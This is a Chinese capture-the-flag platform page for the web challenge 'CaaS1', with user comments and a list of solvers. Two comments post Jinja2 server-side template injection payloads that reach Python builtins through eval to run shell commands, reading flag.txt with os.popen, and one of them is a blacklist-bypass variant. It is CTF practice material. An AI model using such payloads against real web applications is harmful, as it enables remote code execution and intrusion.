CaaS1WEB 未解决

分数: 40 金币: 4
题目作者: Aman
一  血: Paradiso
一血奖励: 4金币
解  决: 75
提  示:
描  述:
CaaS1
其  他: server.zip
评论
124要留就要77 5月前

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 0

baozongwi 1年前

会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 1年前

看不懂啊

回复 0

2552758573 1年前

payload太长了,绕不过去

回复 0

沐沐 2年前

这个题什么意思

回复 0
沐沐 1年前

@cgxx 懂了 好玩这个题

回复 0

cgxx 2年前

模板注入

回复 0

WriteUp

image
vchopin

2 金币

评分(1)

解题动态

out不慢 攻破了该题 22小时前
caocao 攻破了该题 9天前
benx4899 攻破了该题 14天前
pick29 攻破了该题 15天前
365days 攻破了该题 16天前
0cu1ux 攻破了该题 21天前
P19777 攻破了该题 25天前
kukuqi666 攻破了该题 1月前
秋天在哪 攻破了该题 1月前
ashduw 攻破了该题 2月前
mantou 攻破了该题 2月前
llxnking 攻破了该题 2月前
zhuyh69 攻破了该题 2月前
姥姥 攻破了该题 2月前
chaio 攻破了该题 3月前
3229722202 攻破了该题 4月前
15325870583 攻破了该题 4月前
Oak123782 攻破了该题 4月前
td0756 攻破了该题 4月前
Hehe0619 攻破了该题 5月前
问题反馈